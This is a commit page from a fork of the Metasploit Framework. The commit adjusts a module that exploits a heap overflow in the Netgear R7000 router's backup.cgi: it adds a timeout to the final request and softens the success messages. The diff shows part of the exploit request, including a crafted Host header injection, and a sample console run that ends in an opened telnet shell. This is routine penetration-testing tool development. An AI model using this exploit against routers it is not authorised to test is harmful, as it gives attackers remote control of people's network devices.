dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Add in timeout to 10th and final request to prevent module from throwing errors like it isn't working when it really is

This commit is contained in:
Grant Willcox 2021-07-28 11:32:47 -05:00
parent a13f6a35dc
commit a518fcac98
No known key found for this signature in database
GPG Key ID: D35E05C0F2B81E83
2 changed files with 5 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
documentation/modules/auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce.md
View File

@ -51,9 +51,8 @@ msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) > run
[*] Executing automatic check (disable AutoCheck to override)
[*] Router is a NETGEAR router (R7000)
[+] The target is vulnerable.
[*] Sending 10th and final packet. The exploit should hang at this point.
[*] Connect to the telnet shell by running: telnet 192.168.1.1
[+] Exploit complete, connect to your shell!
[*] Sending 10th and final packet...
[*] If the exploit succeeds, you should be able to connect to the telnet shell by running: telnet 192.168.1.1
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/netgear_r7000_backup_cgi_heap_overflow_rce) >
```

11
modules/auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce.rb
View File

@ -311,8 +311,7 @@ class MetasploitModule < Msf::Auxiliary
send_data = post_data.to_s
send_data.sub!(/\r\n--#{post_data.bound}--\r\n/, '')
print_status('Sending 10th and final packet. The exploit should hang at this point.')
print_status("Connect to the telnet shell by running: telnet #{datastore['RHOST']}")
print_status('Sending 10th and final packet...')
res = send_request_cgi({
'method' => 'POST',
@ -321,13 +320,9 @@ class MetasploitModule < Msf::Auxiliary
'agent' => nil, # Disable sending the User-Agent header
'headers' => { 'Host' => "#{datastore['RHOST']}:#{datastore['RPORT']}\r\n#{Rex::Text.rand_text_alpha(512)}: #{Rex::Text.rand_text_alpha(9)}" },
'data' => send_data
})
}, 0)
if !res.nil?
fail_with(Failure::UnexpectedReply, 'The target R7000 router responded on the tenth packet!')
end
print_good('Exploit complete, connect to your shell!')
print_status("If the exploit succeeds, you should be able to connect to the telnet shell by running: telnet #{datastore['RHOST']}")
end
def run